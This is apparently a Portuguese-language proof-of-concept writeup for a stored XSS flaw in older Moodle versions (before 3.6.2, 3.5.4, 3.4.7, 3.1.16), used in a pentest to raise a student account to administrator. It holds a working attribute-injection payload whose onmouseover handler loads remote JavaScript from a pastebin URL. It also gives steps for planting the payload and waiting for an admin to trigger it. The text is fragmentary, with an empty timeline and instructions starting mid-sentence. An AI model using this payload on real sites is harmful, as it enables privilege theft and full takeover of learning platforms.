
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC para Escalação de Privilégios (Aluno para Admin)
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) PoC de XSS para Escalação de Privilégios (Estudante para Administrador). Este é um dos bugs passados que descobri durante um pentest anterior em uma instituição acadêmica. Foi bem-sucedido o suficiente na época para praticamente roubar acesso de administrador e obter controle completo sobre o Moodle usando apenas um bug simples.
Podemos ver pelo histórico do git que o bug existia desde versões antigas do Moodle (2003) e foi corrigido apenas em 2019.
Linha do tempo:
APENAS PARA FINS EDUCACIONAIS. NÃO USE O EXPLOIT PARA ATIVIDADES ILEGAIS. O AUTOR NÃO É RESPONSÁVEL POR QUALQUER USO INDEVIDO OU DANO.
userid para o seu próprio id. Digamos que a URL seja https://pastebin.com/raw/xxxxxxxx." style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')/userpix/ ou coloque o link para essa página em sua postagem e aguarde.Se bem-sucedido, sua conta será adicionada como administrador.